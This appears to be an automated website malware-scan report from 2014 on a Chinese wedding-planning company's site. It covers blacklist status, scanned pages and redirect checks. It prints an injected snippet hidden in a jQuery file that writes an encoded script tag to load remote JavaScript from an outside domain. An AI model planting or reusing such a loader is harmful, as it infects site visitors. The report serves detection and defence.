Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=biai99.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://biai99.com/ | 200 OK Content-Length: 8387 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.csdian.net ...[575 bytes skipped]... »ú¹¹" /> <title>³¤É³»éÇ칫˾,³¤É³»éÇì²ß»®¹«Ë¾,ºþÄÏ»éÇ칫˾,³¤É³±Ë°®»éÇìÀñÒǹ«Ë¾ - ³¤É³Êб˰®»éÇìÀñÒDz߻®¹«Ë¾</title> <link href="/Template/default/css/basic.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/public.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/people.css" rel="stylesheet" type="text/css" /> <script src="http://www.csdian.net/Style/Js/jquery-1.2.6.pack.js"></script> <script type="text/javascript" src="/Style/Js/Common.js"></script> <script type="text/javascript" src="/Style/Js/dialog.js"></script> <script type="text/javascript" src="/qq/js/js.js"></script> </head> <body> <!--Í·²¿¿ªÊ¼--> <div id="Top"><div id="MidLogo"><img src="/Template/default/images/banner.jpg" class="fleft" / ...[3743 bytes skipped]... | ||
http://www.csdian.net/Style/Js/jquery-1.2.6.pack.js | 200 OK Content-Length: 31043 Content-Type: application/x-javascript | clean |
http://biai99.com/Style/Js/Common.js | 200 OK Content-Length: 3790 Content-Type: application/x-javascript | clean |
http://biai99.com/Style/Js/dialog.js | 200 OK Content-Length: 14859 Content-Type: application/x-javascript | clean |
http://biai99.com/qq/js/js.js | 200 OK Content-Length: 96253 Content-Type: application/x-javascript | clean |
http://biai99.com/Template/default/js/jquery-1.4.3.min.js | 200 OK Content-Length: 78201 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,A){function U(){return false}function ba(){return true}function ja(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ga(a){var b,d,e=[],f=[],h,k,l,n,s,v,B,D;k=c.data(this,this.nodeType?"events":"__events__");if(typeof k==="function")k=k.events;if(!(a.liveFired===this||!k||!k.live||a.button&&a.type==="click")){if(a.namespace)D=RegExp("(^|\\.)"+a.namespace.split(".").join("\\.(?:.*\\.)?")+"(\\.|$)");a.liveFired=this;var H=k.live.slice(0);for(n=0;n<H.length;n++){k= if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%65%72%72%6F%72%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://biai99.com/Template/default/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 9287 Content-Type: application/x-javascript | clean |
http://biai99.com/Template/default/js/v.js | 200 OK Content-Length: 551 Content-Type: application/x-javascript | clean |
http://js.users.51.la/15185253.js | 200 OK Content-Length: 1981 Content-Type: application/x-javascript | clean |
http://www.csdian.net/Style/Js/jquery.messager.js | 200 OK Content-Length: 4459 Content-Type: application/x-javascript | clean |
http://biai99.com/gsjj/p1 | 200 OK Content-Length: 8293 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.csdian.net ...[650 bytes skipped]... ¼ò½é - ³¤É³ÓÐÃûµÄ»éÇ칫˾,³¤É³»éÇì²ß»®¹«Ë¾,³¤É³»éÇì²ß»®¼Û¸ñ,³¤É³»éÇ칫˾±¨¼Û,³¤É³»éÇìÀñÒDz߻® - ³¤É³Êб˰®»éÇìÀñÒDz߻®¹«Ë¾</title> <link href="/Template/default/css/basic.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/public.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/people.css" rel="stylesheet" type="text/css" /> <script src="http://www.csdian.net/Style/Js/jquery-1.2.6.pack.js"></script> <script type="text/javascript" src="/Style/Js/Common.js"></script> <script type="text/javascript" src="/Style/Js/dialog.js"></script> <script type="text/javascript" src="/qq/js/js.js"></script> </head> <body> <!--Í·²¿¿ªÊ¼--> <div id="Top"><div id="MidLogo"><img src="/Template/default/images/banner.jpg" class="fleft" / ...[3598 bytes skipped]... | ||
http://biai99.com/about/p1 | 200 OK Content-Length: 9402 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.csdian.net ...[640 bytes skipped]... ;¹ØÓÚÎÒÃÇ - ³¤É³Çìµä²ß»®¹«Ë¾,³¤É³»éÀñ²ß»®,³¤É³»éÀñ²¼ÖÃ,³¤É³»éÀñ³µ¶Ó,³¤É³»éÀñÖ÷³Ö,³¤É³ÐÂÄﻯױ - ³¤É³Êб˰®»éÇìÀñÒDz߻®¹«Ë¾</title> <link href="/Template/default/css/basic.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/public.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/people.css" rel="stylesheet" type="text/css" /> <script src="http://www.csdian.net/Style/Js/jquery-1.2.6.pack.js"></script> <script type="text/javascript" src="/Style/Js/Common.js"></script> <script type="text/javascript" src="/Style/Js/dialog.js"></script> <script type="text/javascript" src="/qq/js/js.js"></script> </head> <body> <!--Í·²¿¿ªÊ¼--> <div id="Top"><div id="MidLogo"><img src="/Template/default/images/banner.jpg" class="fleft" / ...[3611 bytes skipped]... | ||
http://biai99.com/case/p1 | 200 OK Content-Length: 8458 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.csdian.net ...[640 bytes skipped]... ;°¸ÀýÐÀÉÍ - ³¤É³»éÇì²ß»®,³¤É³»éÀñ²ß»®,³¤É³ÐÂÄï¸ú×±,³¤É³»éÇìÀñÒÇ·þÎñ,³¤É³»éÀñ˾ÒÇ,³¤É³»é³µ×âÁÞ - ³¤É³Êб˰®»éÇìÀñÒDz߻®¹«Ë¾</title> <link href="/Template/default/css/basic.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/public.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/people.css" rel="stylesheet" type="text/css" /> <script src="http://www.csdian.net/Style/Js/jquery-1.2.6.pack.js"></script> <script type="text/javascript" src="/Style/Js/Common.js"></script> <script type="text/javascript" src="/Style/Js/dialog.js"></script> <script type="text/javascript" src="/qq/js/js.js"></script> </head> <body> <!--Í·²¿¿ªÊ¼--> <div id="Top"><div id="MidLogo"><img src="/Template/default/images/banner.jpg" class="fleft" / ...[3611 bytes skipped]... | ||
http://biai99.com/service/p1/ | 200 OK Content-Length: 10145 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.csdian.net ...[632 bytes skipped]... e>·þÎñÏîÄ¿ - ³¤É³Çìµä¹«Ë¾,³¤É³»éµäÆó»®,³¤É³»¨ÒÕ·þÎñ,³¤É³ÀñÒÇ·þÎñ,³¤É³Çìµä·þÎñ,³¤É³×â³µ·þÎñ - ³¤É³Êб˰®»éÇìÀñÒDz߻®¹«Ë¾</title> <link href="/Template/default/css/basic.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/public.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/people.css" rel="stylesheet" type="text/css" /> <script src="http://www.csdian.net/Style/Js/jquery-1.2.6.pack.js"></script> <script type="text/javascript" src="/Style/Js/Common.js"></script> <script type="text/javascript" src="/Style/Js/dialog.js"></script> <script type="text/javascript" src="/qq/js/js.js"></script> </head> <body> <!--Í·²¿¿ªÊ¼--> <div id="Top"><div id="MidLogo"><img src="/Template/default/images/banner.jpg" class="fleft" / ...[3625 bytes skipped]... | ||
http://biai99.com/news/p1 | 200 OK Content-Length: 8817 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.csdian.net ...[642 bytes skipped]... ÐÂÎÅ×ÊѶ - ³¤É³»éÇì²ß»®,³¤É³»éÇì²ß»®¹«Ë¾,³¤É³»éÀñ²ß»®,³¤É³»éÀñ²ß»®¹«Ë¾,³¤É³×îºÃµÄ»éÇì·þÎñ¹«Ë¾ - ³¤É³Êб˰®»éÇìÀñÒDz߻®¹«Ë¾</title> <link href="/Template/default/css/basic.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/public.css" rel="stylesheet" type="text/css" /> <link href="/Template/default/css/people.css" rel="stylesheet" type="text/css" /> <script src="http://www.csdian.net/Style/Js/jquery-1.2.6.pack.js"></script> <script type="text/javascript" src="/Style/Js/Common.js"></script> <script type="text/javascript" src="/Style/Js/dialog.js"></script> <script type="text/javascript" src="/qq/js/js.js"></script> </head> <body> <!--Í·²¿¿ªÊ¼--> <div id="Top"><div id="MidLogo"><img src="/Template/default/images/banner.jpg" class="fleft" / ...[3609 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: biai99.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 04 Sep 2014 19:10:00 GMT
Server: Microsoft-IIS/7.5
Content-Length: 8387
Content-Type: text/html; charset=gb2312
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
...8387 bytes of data.
GET / HTTP/1.1
Host: biai99.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 04 Sep 2014 19:10:00 GMT
Server: Microsoft-IIS/7.5
Content-Length: 8387
Content-Type: text/html; charset=gb2312
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
...8387 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: biai99.com
Referer: http://www.google.com/search?q=biai99.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: biai99.com
Referer: http://www.google.com/search?q=biai99.com
Result:
The result is similar to the first query. There are no suspicious redirects found.